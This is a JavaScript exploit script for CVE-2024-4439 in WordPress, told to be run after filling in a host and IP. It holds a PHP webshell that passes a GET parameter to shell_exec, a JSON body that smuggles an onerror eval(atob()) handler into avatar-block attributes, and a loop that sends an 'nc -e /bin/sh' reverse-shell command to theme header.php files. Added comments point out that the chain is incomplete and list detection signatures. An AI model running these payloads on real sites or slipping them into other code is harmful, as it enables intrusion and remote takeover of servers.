// Payload: Reverse Shell
// Description: Exploit for CVE-2024-4439 - WordPress Plugin 'Rest Core' Unauthenticated
// Author: RC
// Instructions: Change URL and IP address in the reverse shell payload and run the script
// Description: The vulnerability arises due to insufficient output escaping of user display names, enabling both authenticated and unauthenticated attackers to inject harmful web scripts.
//
//For authenticated users, particularly those with contributor-level access or higher, the exploit can lead to the injection of arbitrary web scripts into pages that will execute when a user views an affected page. Unauthenticated attackers, on the other hand, can exploit the vulnerability in pages where the comment block is present, displaying the comment author’s avatar.
// PHP snippet held in a template literal. Nothing in this file ever sends,
// writes or otherwise references this constant after it is declared, so the
// "reverse shell" the header comments describe is not actually staged by the
// code below; the later GETs to header.php?cmd= assume a file like this
// already exists on the target.
// Defender note: a PHP file that passes a GET parameter straight to shell_exec
// is a textbook webshell shape; file-integrity monitoring of wp-content and
// theme directories is the control that catches it, not request filtering.
const reverseShellPayload = `<?php
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
}
?>`;
/**
 * Fire-and-forget HTTP GET. The fetch promise is neither returned nor awaited,
 * so callers get `undefined` back immediately and can only observe the
 * outcome through the console: the body is logged on a 2xx response, and a
 * non-OK status or network failure is logged via console.error and swallowed.
 *
 * @param {string} url - Absolute URL to request.
 * @returns {undefined}
 */
function sendRequest(url) {
fetch(url, {
method: 'GET',
headers: {
// Hard-coded desktop-browser User-Agent. Defender note: UA strings are
// client-controlled, so UA allow-listing is not a meaningful control here.
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
})
.then(response => {
if (!response.ok) {
throw new Error(`HTTP error! status: ${response.status}`);
}
return response.text();
})
.then(data => console.log('Command Output:', data))
// Errors are logged, not propagated; the caller cannot tell success from failure.
.catch(error => console.error('Error:', error));
}
// Request target and JSON body for the block-attribute injection.
// [HOST] is a placeholder the user is expected to replace (see header
// comments). NOTE(review): `rest_core_controller_create_item` does not look
// like a WordPress core admin-ajax action; whether it exists at all depends on
// what is installed on the target — confirm before relying on this file as a
// reproduction of the CVE.
const exploitUrl = 'http://[HOST]/wp-admin/admin-ajax.php?action=rest_core_controller_create_item&collection_name=avatars';
// Random hex colour prefixed to the injected border colour; Math.random() is
// fine here since the value is only cosmetic, not security-relevant.
const randomColor = '#' + Math.floor(Math.random()*16777215).toString(16); // Random color for obfuscation
const exploitData = JSON.stringify({
attributes: {
size: 96,
userId: 1,
style: {
border: {
// The colour string contains a closing double quote followed by extra
// key/value text ("type", "onerror"); presumably intended to break out
// of the serialised attribute and add an onerror handler — the CVE
// description above calls this insufficient output escaping. Note that
// `this.id` in the handler is never set anywhere in this file.
// Defender note: stored avatar-block attributes containing `onerror` or
// `eval(atob(` are a high-signal indicator for content scanning, and
// unauthenticated POSTs to admin-ajax.php with this action name are a
// useful WAF/log signature. The upstream fix for CVE-2024-4439 is to
// run a patched WordPress release.
color: `${randomColor}", "type": "text/css", "onerror": "eval(atob(this.id))//`
}
}
},
content: 'Exploited!',
blockName: 'core/avatar',
// Random suffix only; the 'exploited-' prefix is itself a grep-able marker.
clientId: 'exploited-' + Math.random().toString(36).substring(7),
blockVersion: 1,
innerBlocks: []
});
// POST the JSON body above to admin-ajax.php. The chain is a floating promise
// at module level: nothing awaits it, so the script exits when the event loop
// drains regardless of outcome.
fetch(exploitUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
,
body: exploitData
})
.then(response => {
if (!response.ok) {
throw new Error(`HTTP error! status: ${response.status}`);
}
// Any 2xx response is treated as success; a non-JSON body rejects the chain
// here and lands in the catch below.
return response.json();
})
.then(data => {
console.log('Exploit successful:', data);
// After a 2xx, send one GET per theme directory to header.php with a `cmd`
// query parameter. This only does anything if a handler for `cmd` already
// exists in that file; this script never writes or modifies any theme file,
// and the earlier POST touches block attributes, not the filesystem, so these
// requests do not follow from the injection above.
// Defender note: direct requests to /wp-content/themes/*/header.php with a
// query string are not produced by normal WordPress page loads and are a
// clean access-log signature for this kind of activity.
const themes = ['twentytwenty', 'twentytwentyfour', 'twentytwentythree', 'twentytwentytwo', 'mintify']; // Add more themes if needed
const cmd = encodeURIComponent('nc -e /bin/sh [IP] 4444');
// sendRequest is fire-and-forget, so all theme requests go out concurrently
// and their results are only visible via console output.
themes.forEach(theme => {
const reverseShellUrl = `http://[HOST]/wp-content/themes/${theme}/header.php?cmd=${cmd}`;
sendRequest(reverseShellUrl);
});
})
.catch(error => console.error('Exploit failed:', error));